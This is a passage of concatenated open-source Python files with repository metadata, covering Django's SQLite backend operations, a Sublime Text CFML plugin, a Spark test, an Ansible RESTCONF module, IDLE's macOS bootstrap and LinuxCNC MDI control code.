raise NotImplementedError(
'You cannot use Sum, Avg, StdDev, and Variance '
'aggregations on date/time fields in sqlite3 '
'since date/time is saved as text.'
)
except FieldError:
# Not every subexpression has an output_field which is fine
# to ignore.
pass
def date_extract_sql(self, lookup_type, field_name):
# sqlite doesn't support extract, so we fake it with the user-defined
# function django_date_extract that's registered in connect(). Note that
# single quotes are used because this is a string (and could otherwise
# cause a collision with a field name).
return "django_date_extract('%s', %s)" % (lookup_type.lower(), field_name)
def date_interval_sql(self, timedelta):
return "'%s'" % duration_string(timedelta), []
def format_for_duration_arithmetic(self, sql):
"""Do nothing here, we will handle it in the custom function."""
return sql
def date_trunc_sql(self, lookup_type, field_name):
# sqlite doesn't support DATE_TRUNC, so we fake it with a user-defined
# function django_date_trunc that's registered in connect(). Note that
# single quotes are used because this is a string (and could otherwise
# cause a collision with a field name).
return "django_date_trunc('%s', %s)" % (lookup_type.lower(), field_name)
def _require_pytz(self):
if settings.USE_TZ and pytz is None:
raise ImproperlyConfigured("This query requires pytz, but it isn't installed.")
def datetime_cast_date_sql(self, field_name, tzname):
self._require_pytz()
return "django_datetime_cast_date(%s, %%s)" % field_name, [tzname]
def datetime_extract_sql(self, lookup_type, field_name, tzname):
# Same comment as in date_extract_sql.
self._require_pytz()
return "django_datetime_extract('%s', %s, %%s)" % (
lookup_type.lower(), field_name), [tzname]
def datetime_trunc_sql(self, lookup_type, field_name, tzname):
# Same comment as in date_trunc_sql.
self._require_pytz()
return "django_datetime_trunc('%s', %s, %%s)" % (
lookup_type.lower(), field_name), [tzname]
def time_extract_sql(self, lookup_type, field_name):
# sqlite doesn't support extract, so we fake it with the user-defined
# function django_time_extract that's registered in connect(). Note that
# single quotes are used because this is a string (and could otherwise
# cause a collision with a field name).
return "django_time_extract('%s', %s)" % (lookup_type.lower(), field_name)
def drop_foreignkey_sql(self):
return ""
def pk_default_value(self):
return "NULL"
def quote_name(self, name):
if name.startswith('"') and name.endswith('"'):
return name # Quoting once is enough.
return '"%s"' % name
def no_limit_value(self):
return -1
def sql_flush(self, style, tables, sequences, allow_cascade=False):
# NB: The generated SQL below is specific to SQLite
# Note: The DELETE FROM... SQL generated below works for SQLite databases
# because constraints don't exist
sql = ['%s %s %s;' % (
style.SQL_KEYWORD('DELETE'),
style.SQL_KEYWORD('FROM'),
style.SQL_FIELD(self.quote_name(table))
) for table in tables]
# Note: No requirement for reset of auto-incremented indices (cf. other
# sql_flush() implementations). Just return SQL at this point
return sql
def adapt_datetimefield_value(self, value):
if value is None:
return None
# SQLite doesn't support tz-aware datetimes
if timezone.is_aware(value):
if settings.USE_TZ:
value = timezone.make_naive(value, self.connection.timezone)
else:
raise ValueError("SQLite backend does not support timezone-aware datetimes when USE_TZ is False.")
return six.text_type(value)
def adapt_timefield_value(self, value):
if value is None:
return None
# SQLite doesn't support tz-aware datetimes
if timezone.is_aware(value):
raise ValueError("SQLite backend does not support timezone-aware times.")
return six.text_type(value)
def get_db_converters(self, expression):
converters = super(DatabaseOperations, self).get_db_converters(expression)
internal_type = expression.output_field.get_internal_type()
if internal_type == 'DateTimeField':
converters.append(self.convert_datetimefield_value)
elif internal_type == 'DateField':
converters.append(self.convert_datefield_value)
elif internal_type == 'TimeField':
converters.append(self.convert_timefield_value)
elif internal_type == 'DecimalField':
converters.append(self.convert_decimalfield_value)
elif internal_type == 'UUIDField':
converters.append(self.convert_uuidfield_value)
return converters
def convert_datetimefield_value(self, value, expression, connection, context):
if value is not None:
if not isinstance(value, datetime.datetime):
value = parse_datetime(value)
if settings.USE_TZ:
value = timezone.make_aware(value, self.connection.timezone)
return value
def convert_datefield_value(self, value, expression, connection, context):
if value is not None:
if not isinstance(value, datetime.date):
value = parse_date(value)
return value
def convert_timefield_value(self, value, expression, connection, context):
if value is not None:
if not isinstance(value, datetime.time):
value = parse_time(value)
return value
def convert_decimalfield_value(self, value, expression, connection, context):
if value is not None:
value = expression.output_field.format_number(value)
value = backend_utils.typecast_decimal(value)
return value
def convert_uuidfield_value(self, value, expression, connection, context):
if value is not None:
value = uuid.UUID(value)
return value
def bulk_insert_sql(self, fields, num_values):
res = []
res.append("SELECT %s" % ", ".join(
"%%s AS %s" % self.quote_name(f.column) for f in fields
))
res.extend(["UNION ALL SELECT %s" % ", ".join(["%s"] * len(fields))] * (num_values - 1))
return " ".join(res)
def combine_expression(self, connector, sub_expressions):
# SQLite doesn't have a power function, so we fake it with a
# user-defined function django_power that's registered in connect().
if connector == '^':
return 'django_power(%s)' % ','.join(sub_expressions)
return super(DatabaseOperations, self).combine_expression(connector, sub_expressions)
def combine_duration_expression(self, connector, sub_expressions):
if connector not in ['+', '-']:
raise utils.DatabaseError('Invalid connector for timedelta: %s.' % connector)
fn_params = ["'%s'" % connector] + sub_expressions
if len(fn_params) > 3:
raise ValueError('Too many params for timedelta operations.')
return "django_format_dtdelta(%s)" % ', '.join(fn_params)
def integer_field_range(self, internal_type):
# SQLite doesn't enforce any integer constraints
return (None, None)
| bsd-3-clause |
thomasrotter/sublimetext-cfml | cfml_plugin.py | 1 | 3757 | import sublime
import sublime_plugin
from HTML.html_completions import HtmlTagCompletions
from .src import command_list, completions, events, utils, _plugin_loaded
for command in command_list:
globals()[command.__name__] = command
def plugin_loaded():
_plugin_loaded()
class CfmlEventListener(sublime_plugin.EventListener):
def on_load_async(self, view):
events.trigger("on_load_async", view)
def on_close(self, view):
events.trigger("on_close", view)
def on_modified_async(self, view):
events.trigger("on_modified_async", view)
def on_post_save_async(self, view):
if not view.file_name():
print(
"CFML: file was saved and closed - it is not possible to determine the file path."
)
return
events.trigger("on_post_save_async", view)
def on_post_text_command(self, view, command_name, args):
if command_name == "commit_completion":
pos = view.sel()[0].begin()
if view.match_selector(
pos,
"meta.tag.cfml -source.cfml.script, meta.tag.script.cfml, meta.tag.script.cf.cfml, meta.class.declaration.cfml -meta.class.inheritance.cfml",
):
if view.substr(pos - 1) in [" ", '"', "'", "="]:
view.run_command("auto_complete", {"api_completions_only": True})
elif view.substr(pos) == '"':
# an attribute completion was most likely just inserted
# advance cursor past double quote character
view.run_command("move", {"by": "characters", "forward": True})
if view.substr(pos - 1) == ":" and view.match_selector(
pos - 1, "meta.tag.custom.cfml -source.cfml.script"
):
view.run_command("auto_complete", {"api_completions_only": True})
if view.substr(pos - 1) == "." and view.match_selector(
pos - 1,
"meta.function-call.support.createcomponent.cfml string.quoted, entity.other.inherited-class.cfml, meta.instance.constructor.cfml",
):
view.run_command("auto_complete", {"api_completions_only": True})
def on_post_window_command(self, window, command_name, args):
events.trigger("on_post_window_command", window, command_name, args)
def on_query_completions(self, view, prefix, locations):
if not view.match_selector(locations[0], "embedding.cfml"):
return None
return completions.get_completions(view, locations[0], prefix)
def on_hover(self, view, point, hover_zone):
if hover_zone != sublime.HOVER_TEXT:
return
if not view.match_selector(point, "embedding.cfml"):
return
view.run_command(
"cfml_inline_documentation", {"pt": point, "doc_type": "hover_doc"}
)
class CustomHtmlTagCompletions(HtmlTagCompletions):
"""
There is no text.html scope in <cffunction> bodies, so this
allows the HTML completions to still function there
"""
def on_query_completions(self, view, prefix, locations):
if not utils.get_setting("html_completions_in_tag_components"):
return None
# Only trigger within CFML tag component functions
selector = "meta.class.body.tag.cfml meta.function.body.tag.cfml -source.cfml.script -source.sql"
if not view.match_selector(locations[0], selector):
return None
# check if we are inside a tag
is_inside_tag = view.match_selector(
locations[0], "meta.tag - punctuation.definition.tag.begin"
)
return self.get_completions(view, prefix, locations, is_inside_tag)
| mit |
samklr/spark-testing-base | python/sparktestingbase/test/helloworld_test.py | 8 | 1219 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Simple test example"""
from sparktestingbase.testcase import SparkTestingBaseTestCase
class HelloWorldTest(SparkTestingBaseTestCase):
"""Simple hell world example test."""
def test_basic(self):
"""Test a parallelize & collect."""
input = ["hello world"]
rdd = self.sc.parallelize(input)
result = rdd.collect()
assert result == input
if __name__ == "__main__":
unittest2.main()
| apache-2.0 |
pilou-/ansible | lib/ansible/modules/network/restconf/restconf_get.py | 47 | 3174 | #!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = """
---
module: restconf_get
version_added: "2.8"
author: "Ganesh Nalawade (@ganeshrn)"
short_description: Fetch configuration/state data from RESTCONF enabled devices.
description:
- RESTCONF is a standard mechanisms to allow web applications to access the
configuration data and state data developed and standardized by
the IETF. It is documented in RFC 8040.
- This module allows the user to fetch configuration and state data from RESTCONF
enabled devices.
options:
path:
description:
- URI being used to execute API calls.
required: true
content:
description:
- The C(content) is a query parameter that controls how descendant nodes of the
requested data nodes in C(path) will be processed in the reply. If value is
I(config) return only configuration descendant data nodes of value in C(path).
If value is I(nonconfig) return only non-configuration descendant data nodes
of value in C(path). If value is I(all) return all descendant data nodes of
value in C(path)
required: false
choices: ['config', 'nonconfig', 'all']
output:
description:
- The output of response received.
required: false
default: json
choices: ['json', 'xml']
"""
EXAMPLES = """
- name: get l3vpn services
restconf_get:
path: /config/ietf-l3vpn-svc:l3vpn-svc/vpn-services
"""
RETURN = """
response:
description: A dictionary representing a JSON-formatted response
returned: when the device response is valid JSON
type: dict
sample: |
{
"vpn-services": {
"vpn-service": [
{
"customer-name": "red",
"vpn-id": "blue_vpn1",
"vpn-service-topology": "ietf-l3vpn-svc:any-to-any"
}
]
}
}
"""
from ansible.module_utils._text import to_text
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import ConnectionError
from ansible.module_utils.network.restconf import restconf
def main():
"""entry point for module execution
"""
argument_spec = dict(
path=dict(required=True),
content=dict(choices=['config', 'nonconfig', 'all']),
output=dict(choices=['json', 'xml'], default='json'),
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True
)
result = {'changed': False}
try:
response = restconf.get(module, **module.params)
except ConnectionError as exc:
module.fail_json(msg=to_text(exc), code=exc.code)
result.update({
'response': response,
})
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
yawnosnorous/python-for-android | python3-alpha/python3-src/Mac/IDLE/IDLE.app/Contents/Resources/idlemain.py | 71 | 2786 | """
Bootstrap script for IDLE as an application bundle.
"""
import sys, os
# Change the current directory the user's home directory, that way we'll get
# a more useful default location in the open/save dialogs.
os.chdir(os.path.expanduser('~/Documents'))
# Make sure sys.executable points to the python interpreter inside the
# framework, instead of at the helper executable inside the application
# bundle (the latter works, but doesn't allow access to the window server)
#
# .../IDLE.app/
# Contents/
# MacOS/
# IDLE (a python script)
# Python{-32} (symlink)
# Resources/
# idlemain.py (this module)
# ...
#
# ../IDLE.app/Contents/MacOS/Python{-32} is symlinked to
# ..Library/Frameworks/Python.framework/Versions/m.n
# /Resources/Python.app/Contents/MacOS/Python{-32}
# which is the Python interpreter executable
#
# The flow of control is as follows:
# 1. IDLE.app is launched which starts python running the IDLE script
# 2. IDLE script exports
# PYTHONEXECUTABLE = .../IDLE.app/Contents/MacOS/Python{-32}
# (the symlink to the framework python)
# 3. IDLE script alters sys.argv and uses os.execve to replace itself with
# idlemain.py running under the symlinked python.
# This is the magic step.
# 4. During interpreter initialization, because PYTHONEXECUTABLE is defined,
# sys.executable may get set to an unuseful value.
#
# (Note that the IDLE script and the setting of PYTHONEXECUTABLE is
# generated automatically by bundlebuilder in the Python 2.x build.
# Also, IDLE invoked via command line, i.e. bin/idle, bypasses all of
# this.)
#
# Now fix up the execution environment before importing idlelib.
# Reset sys.executable to its normal value, the actual path of
# the interpreter in the framework, by following the symlink
# exported in PYTHONEXECUTABLE.
pyex = os.environ['PYTHONEXECUTABLE']
sys.executable = os.path.join(os.path.dirname(pyex), os.readlink(pyex))
# Remove any sys.path entries for the Resources dir in the IDLE.app bundle.
p = pyex.partition('.app')
if p[2].startswith('/Contents/MacOS/Python'):
sys.path = [value for value in sys.path if
value.partition('.app') != (p[0], p[1], '/Contents/Resources')]
# Unexport PYTHONEXECUTABLE so that the other Python processes started
# by IDLE have a normal sys.executable.
del os.environ['PYTHONEXECUTABLE']
# Look for the -psn argument that the launcher adds and remove it, it will
# only confuse the IDLE startup code.
for idx, value in enumerate(sys.argv):
if value.startswith('-psn_'):
del sys.argv[idx]
break
# Now it is safe to import idlelib.
from idlelib.PyShell import main
if __name__ == '__main__':
main()
| apache-2.0 |
ianmcmahon/linuxcnc-mirror | src/emc/usr_intf/gscreen/mdi.py | 36 | 13854 | # Touchy is Copyright (c) 2009 Chris Radek <chris@timeguy.com>
#
# Touchy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# Touchy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# self.mcodes = (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 30, 48, 49, 50, 51,
# 52, 53, 60, 61, 62, 63, 64, 65, 66, 67, 68)
#
# self.gcodes = (0, 10, 20, 30, 40, 50, 51, 52, 53, 70, 80, 100,
# 170, 171, 180, 181, 190, 191, 200, 210, 280, 281,
# 300, 301, 330, 331, 382, 383, 384, 385, 400, 410,
# 411, 420, 421, 430, 431, 490, 530, 540, 550, 560,
# 570, 580, 590, 591, 592, 593, 610, 611, 640, 730,
# 760, 800, 810, 820, 830, 840, 850, 860, 870, 880,
# 890, 900, 901, 910, 911, 920, 921, 922, 923, 930,
# 940, 950, 960, 970, 980, 990)
class mdi:
def __init__(self, emc):
self.clear()
self.emc = emc
self.emcstat = emc.stat()
self.emccommand = emc.command()
self.emcstat.poll()
am = self.emcstat.axis_mask
self.axes = []
self.polar = 0
axisnames = ['X', 'Y', 'Z', 'A', 'B', 'C', 'U', 'V', 'W']
for i in range(9):
if am & (1<<i):
self.axes.append(axisnames[i])
self.gcode = 'M2'
self.codes = {
'M3' : [_('Spindle CW'), 'S'],
'M4' : [_('Spindle CCW'), 'S'],
'M6' : [_('Tool change'), 'T'],
'M66' : [_('Input control'), 'P', 'E', 'L', 'Q'],
# 'A' means 'the axes'
'G0' : [_('Straight rapid'), 'A'],
'G00' : [_('Straight rapid'), 'A'],
'G1' : [_('Straight feed'), 'A', 'F'],
'G01' : [_('Straight feed'), 'A', 'F'],
'G2' : [_('Arc CW'), 'A', 'I', 'J', 'K', 'R', 'F'],
'G02' : [_('Arc CW'), 'A', 'I', 'J', 'K', 'R', 'F'],
'G3' : [_('Arc CCW'), 'A', 'I', 'J', 'K', 'R', 'F'],
'G03' : [_('Arc CCW'), 'A', 'I', 'J', 'K', 'R', 'F'],
'G4' : [_('Dwell'), 'P'],
'G04' : [_('Dwell'), 'P'],
'G10' : [_('Setup'), 'L', 'P', 'A', 'Q', 'R'],
'G33' : [_('Spindle synchronized feed'), 'A', 'K'],
'G33.1' : [_('Rigid tap'), 'Z', 'K'],
'G38.2' : [_('Probe'), 'A', 'F'],
'G38.3' : [_('Probe'), 'A', 'F'],
'G38.4' : [_('Probe'), 'A', 'F'],
'G38.5' : [_('Probe'), 'A', 'F'],
'G41' : [_('Radius compensation left'), 'D'],
'G42' : [_('Radius compensation right'), 'D'],
'G41.1' : [_('Radius compensation left, immediate'), 'D', 'L'],
'G42.1' : [_('Radius compensation right, immediate'), 'D', 'L'],
'G43' : [_('Tool length offset'), 'H'],
'G43.1' : [_('Tool length offset immediate'), 'I', 'K'],
'G53' : [_('Motion in unoffset coordinates'), 'G', 'A', 'F'],
'G64' : [_('Continuous mode'), 'P'],
'G76' : [_('Thread'), 'Z', 'P', 'I', 'J', 'K', 'R', 'Q', 'H', 'E', 'L'],
'G81' : [_('Drill'), 'A', 'R', 'L', 'F'],
'G82' : [_('Drill with dwell'), 'A', 'R', 'L', 'P', 'F'],
'G83' : [_('Peck drill'), 'A', 'R', 'L', 'Q', 'F'],
'G73' : [_('Chip-break drill'), 'A', 'R', 'L', 'Q', 'F'],
'G85' : [_('Bore'), 'A', 'R', 'L', 'F'],
'G89' : [_('Bore with dwell'), 'A', 'R', 'L', 'P', 'F'],
'G92' : [_('Offset all coordinate systems'), 'A'],
'G96' : [_('CSS Mode'), 'S', 'D'],
}
self.ocodes = []
def add_macros(self, macros):
for m in macros:
words = m.split()
call = "O<%s> call" % words[0]
args = [''] + [w + ' ' for w in words[1:]]
self.ocodes.append(call)
self.codes[call] = args
def get_description(self, gcode):
return self.codes[gcode][0]
def get_words(self, gcode):
self.gcode = gcode
if gcode[0] == 'M' and gcode.find(".") == -1 and int(gcode[1:]) >= 100 and int(gcode[1:]) <= 199:
return ['P', 'Q']
if not self.codes.has_key(gcode):
return []
# strip description
words = self.codes[gcode][1:]
# replace A with the real axis names
if 'A' in words:
i = words.index('A')
words = words[:i] + self.axes + words[i+1:]
if self.polar and 'X' in self.axes and 'Y' in self.axes:
words[self.axes.index('X')] = '@'
words[self.axes.index('Y')] = '^'
return words
def clear(self):
self.words = {}
def set_word(self, word, value):
self.words[word] = value
def set_polar(self, p):
self.polar = p;
def issue(self):
m = self.gcode
if m.lower().startswith('o'):
codes = self.codes[m]
for code in self.codes[m][1:]:
v = self.words[code] or "0"
m = m + " [%s]" % v
else:
w = [i for i in self.words if len(self.words.get(i)) > 0]
if '@' in w:
m += '@' + self.words.get('@')
w.remove('@')
if '^' in w:
m += '^' + self.words.get('^')
w.remove('^')
for i in w:
if len(self.words.get(i)) > 0:
m += i + self.words.get(i)
self.emcstat.poll()
if self.emcstat.task_mode != self.emc.MODE_MDI:
self.emccommand.mode(self.emc.MODE_MDI)
self.emccommand.wait_complete()
self.emccommand.mdi(m)
def set_tool_touchoff(self,tool,axis,value):
m = "G10 L10 P%d %s%f"%(tool,axis,value)
self.emcstat.poll()
if self.emcstat.task_mode != self.emc.MODE_MDI:
self.emccommand.mode(self.emc.MODE_MDI)
self.emccommand.wait_complete()
self.emccommand.mdi(m)
self.emccommand.wait_complete()
self.emccommand.mdi("g43")
def set_axis_origin(self,axis,value):
m = "G10 L20 P0 %s%f"%(axis,value)
self.emcstat.poll()
if self.emcstat.task_mode != self.emc.MODE_MDI:
self.emccommand.mode(self.emc.MODE_MDI)
self.emccommand.wait_complete()
self.emccommand.mdi(m)
def go_to_position(self,axis,position,feedrate):
m = "G1 %s %f F%f"%(axis,position,feedrate)
self.emcstat.poll()
if self.emcstat.task_mode != self.emc.MODE_MDI:
self.emccommand.mode(self.emc.MODE_MDI)
self.emccommand.wait_complete()
self.emccommand.mdi(m)
def set_spindle_speed(self,value):
m = "s %f"%(value)
self.emcstat.poll()
if self.emcstat.task_mode != self.emc.MODE_MDI:
self.emccommand.mode(self.emc.MODE_MDI)
self.emccommand.wait_complete()
self.emccommand.mdi(m)
def set_user_system(self,value):
m = "g %f"%(value)
self.emcstat.poll()
if self.emcstat.task_mode != self.emc.MODE_MDI:
self.emccommand.mode(self.emc.MODE_MDI)
self.emccommand.wait_complete()
self.emccommand.mdi(m)
def index_tool(self,toolnumber):
m = "T %f M6"%(toolnumber)
self.emcstat.poll()
if self.emcstat.task_mode != self.emc.MODE_MDI:
self.emccommand.mode(self.emc.MODE_MDI)
self.emccommand.wait_complete()
self.emccommand.mdi("m6 T %f"%(toolnumber))
self.emccommand.mdi("g43 h%f"%(toolnumber))
def arbitrary_mdi(self,command):
if self.emcstat.task_mode != self.emc.MODE_MDI:
self.emccommand.mode(self.emc.MODE_MDI)
self.emccommand.wait_complete()
self.emccommand.mdi(command)
class mdi_control:
def __init__(self, gtk, emc, labels, eventboxes):
self.labels = labels
self.eventboxes = eventboxes
self.numlabels = len(labels)
self.numwords = 1
self.selected = 0
self.gtk = gtk
self.mdi = mdi(emc)
#for i in range(self.numlabels):
# self.not_editing(i)
#self.editing(self.selected)
#self.set_text("G")
def mdi_is_reading(self):
self.mdi.emcstat.poll()
if self.mdi.emcstat.interp_state == self.mdi.emc.INTERP_READING:
return True
return False
def set_mdi_mode(self):
self.mdi.emcstat.poll()
if self.mdi.emcstat.task_mode != self.mdi.emc.MODE_MDI:
self.mdi.emccommand.mode(self.mdi.emc.MODE_MDI)
self.mdi.emccommand.wait_complete()
def set_axis(self,axis,value):
premode = self.mdi.emcstat.task_mode
self.mdi.set_axis_origin(axis,value)
self.mdi.emccommand.mode(premode)
self.mdi.emccommand.wait_complete()
def touchoff(self,tool,axis,value):
premode = self.mdi.emcstat.task_mode
self.mdi.set_tool_touchoff(tool,axis,value)
self.mdi.emccommand.mode(premode)
self.mdi.emccommand.wait_complete()
def set_spindle_speed(self,value):
self.mdi.set_spindle_speed(value)
def go_to_position(self,axis,position,feedrate):
self.mdi.go_to_position(axis,position,feedrate)
def set_user_system(self,system):
print "set user system to :G",system
premode = self.mdi.emcstat.task_mode
self.mdi.set_user_system(system)
self.mdi.emccommand.mode(premode)
self.mdi.emccommand.wait_complete()
def index_tool(self,toolnumber):
print "set tool number to :T",toolnumber
premode = self.mdi.emcstat.task_mode
self.mdi.index_tool(toolnumber)
#self.mdi.emccommand.mode(premode)
#self.mdi.emccommand.wait_complete()
def user_command(self,command):
premode = self.mdi.emcstat.task_mode
self.mdi.arbitrary_mdi(command)
#self.mdi.emccommand.mode(premode)
#self.mdi.emccommand.wait_complete()
def not_editing(self, n):
e = self.eventboxes[n]
e.modify_bg(self.gtk.STATE_NORMAL, self.gtk.gdk.color_parse("#ccc"))
def editing(self, n):
self.not_editing(self.selected)
self.selected = n
e = self.eventboxes[n]
e.modify_bg(self.gtk.STATE_NORMAL, self.gtk.gdk.color_parse("#fff"))
def get_text(self):
w = self.labels[self.selected]
return w.get_text()
def set_text(self, t, n = -1):
if n == -1: n = self.selected
w = self.labels[n]
w.set_text(t)
if n > 0:
head = t.rstrip("0123456789.-")
tail = t[len(head):]
self.mdi.set_word(head, tail)
if len(t) < 2:
w.set_alignment(1.0, 0.5)
else:
w.set_alignment(0.0, 0.5)
def clear(self, b):
t = self.get_text()
self.set_text(t.rstrip("0123456789.-"))
def back(self, b):
t = self.get_text()
if t[-1:] in "0123456789.-":
self.set_text(t[:-1])
def fill_out(self):
if self.selected == 0:
w = self.mdi.get_words(self.get_text())
self.numwords = len(w)
for i in range(1,self.numlabels):
if i <= len(w):
self.set_text(w[i-1], i)
else:
self.set_text("", i)
def next(self, b):
self.fill_out();
if self.numwords > 0:
self.editing(max(1,(self.selected+1) % (self.numwords+1)))
def ok(self, b):
self.fill_out();
self.mdi.issue()
def decimal(self, b):
t = self.get_text()
if t.find(".") == -1:
self.set_text(t + ".")
def minus(self, b):
t = self.get_text()
if self.selected > 0:
head = t.rstrip("0123456789.-")
tail = t[len(head):]
if tail.find("-") == -1:
self.set_text(head + "-" + tail)
else:
self.set_text(head + tail[1:])
def keypad(self, b):
t = self.get_text()
num = b.get_name()
self.set_text(t + num)
def gp(self, b):
self.g(b, "G", 1)
def g(self, b, code="G", polar=0):
self.mdi.set_polar(polar)
self.set_text(code, 0)
for i in range(1, self.numlabels):
self.set_text("", i)
self.editing(0)
self.mdi.clear()
def m(self, b):
self.g(b, "M")
def t(self, b):
self.g(b, "T")
def o(self, b):
old_code = self.labels[0].get_text()
ocodes = self.mdi.ocodes
if old_code in ocodes:
j = (ocodes.index(old_code) + 1) % len(ocodes)
else:
j = 0
self.g(b, ocodes[j])
self.next(b)
def select(self, eventbox, event):
n = int(eventbox.get_name()[12:])
if self.selected == 0:
self.fill_out()
if n <= self.numwords:
self.editing(n)
def set_tool(self, tool, g10l11):
self.g(0)
self.set_text("G10", 0)
self.next(0)
if g10l11:
self.set_text("L11", 1)
else:
self.set_text("L10", 1)
self.next(0)
self.set_text("P%d" % tool, 2)
self.next(0)
self.next(0)
self.next(0)
def set_origin(self, system):
self.g(0)
self.set_text("G10", 0)
self.next(0)
self.set_text("L20", 1)
self.next(0)
self.set_text("P%d" % system, 2)
self.next(0)
| lgpl-2.1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.